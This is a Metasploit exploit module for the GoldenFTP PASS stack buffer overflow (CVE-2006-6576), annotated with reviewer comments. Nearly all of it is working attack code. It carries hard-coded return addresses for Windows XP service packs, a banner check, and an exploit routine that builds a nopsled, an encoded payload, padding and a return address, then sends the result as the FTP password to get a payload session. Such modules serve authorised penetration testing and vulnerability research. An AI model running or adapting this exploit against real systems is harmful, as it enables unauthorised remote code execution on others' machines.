##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Module for the GoldenFTP PASS stack buffer overflow (CVE-2006-6576).
  # `check` is passive and banner-based; `exploit` delivers a crafted PASS
  # argument and then hands off to the payload handler.
  Rank = AverageRanking

  include Msf::Exploit::Remote::Ftp

  # Registers module metadata: name, references, payload constraints
  # (440 bytes, no NUL/LF/CR), three Windows XP targets with hard-coded
  # return addresses, and SEH as the default exit technique.
  #
  # @param info [Hash] module info merged via `update_info`
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GoldenFTP PASS Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a vulnerability in the Golden FTP service, using the PASS
          command to cause a buffer overflow. Please note that in order trigger the vulnerable
          code, the victim machine must have the "Show new connections" setting enabled. By
          default, this option is unchecked.
        },
        'Author' => [
          'Craig Freyman', # Initial poc on exploit-db with iglesiasgg
          'bannedit', # Initial msf module
          'Joff Thyer <jsthyer[at]gmail.com>', # Improved msf version
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2006-6576'],
          [ 'OSVDB', '35951'],
          [ 'BID', '45957'],
          [ 'EDB', '16036'],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'seh',
        },
        'Privileged' => false,
        'Payload' => {
          'Space' => 440,
          'BadChars' => "\x00\x0a\x0d",
        },
        'Platform' => ['win'],
        'Targets' => [
          # Return addresses are fixed per service pack; a mismatched target
          # crashes the service rather than yielding a session.
          [ 'Windows XP Pro SP3', { 'Ret' => 0x7E45AE4E, } ], # JMP ESI USER32.dll
          [ 'Windows XP Pro SP2', { 'Ret' => 0x77D4E23B, } ], # JMP ESI USER32.dll
          [ 'Windows XP Pro SP0/SP1', { 'Ret' => 0x77e8157b, } ] # JMP ESI kernel32.dll
        ],
        'DisclosureDate' => '2011-01-23',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Fingerprints the service from its FTP banner only; beyond the
  # connect/disconnect nothing is sent, so this is the low-impact way to
  # confirm exposure.
  #
  # Only an exact "4.70" banner yields Appears; any other 4.xx version, or
  # no match at all, yields Safe. The "Show new connections" requirement
  # stated in the description is not observable from the banner, so Appears
  # does not guarantee the vulnerable code path is actually reachable.
  #
  # @return [Exploit::CheckCode] Appears or Safe
  def check
    connect
    disconnect
    vprint_status("FTP Banner: #{banner}".strip)
    # NOTE(review): low-precedence `and` is safe here only because the whole
    # expression is the `if` condition; `&&` would be the conventional form.
    # `$1` is the captured "4.xx" version string.
    if banner =~ /Golden FTP Server ready v(4\.\d{2})/ and $1 == "4.70"
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Builds the overflow buffer and sends it as the PASS argument. Layout, in
  # order: nopsled, encoded payload, padding, then the target's return
  # address packed little-endian. Padding is sized so that the source
  # address length, sled, payload and padding total 533 bytes.
  #
  # Side effects: opens a connection to RHOST:RPORT, pauses 2 seconds, then
  # runs the payload handler and disconnects.
  def exploit
    shortjmp = make_nops(3) + "\xeb\x20"
    nopsled = make_nops(1) * 60
    # Length of the local source address string; it counts against the
    # fixed 533-byte budget below.
    srciplen = Rex::Socket.source_address.length
    # NOTE(review): with 'Space' => 440 and a 60-byte sled, 33 bytes remain
    # for srciplen. A longer source address string (e.g. an IPv6 literal)
    # makes the repeat count negative and String#* raises ArgumentError;
    # the module does not guard against that.
    padding = make_nops(1) * (533 - (srciplen + nopsled.length + payload.encoded.length))

    # NOTE(review): `sploit` aliases the `nopsled` String, so the `<<`
    # appends mutate `nopsled` too; harmless since it is not reused below.
    sploit = nopsled
    sploit << payload.encoded
    sploit << padding
    sploit << [target.ret].pack('V') # 32-bit little-endian return address

    print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}")

    connect
    # Sent before the USER/PASS exchange; presumably written to the control
    # socket without FTP command framing — verify against the Ftp mixin.
    raw_send(shortjmp + "\n")
    send_user(datastore['FTPUSER'])
    # Second argument false: presumably skips reading the server reply to
    # PASS (the service is expected to crash) — confirm against `send_cmd`.
    send_cmd(['PASS', sploit], false)
    # Kernel#select with no IO sets: a 2-second pause before the handler runs.
    select(nil, nil, nil, 2)
    handler
    disconnect
  end
end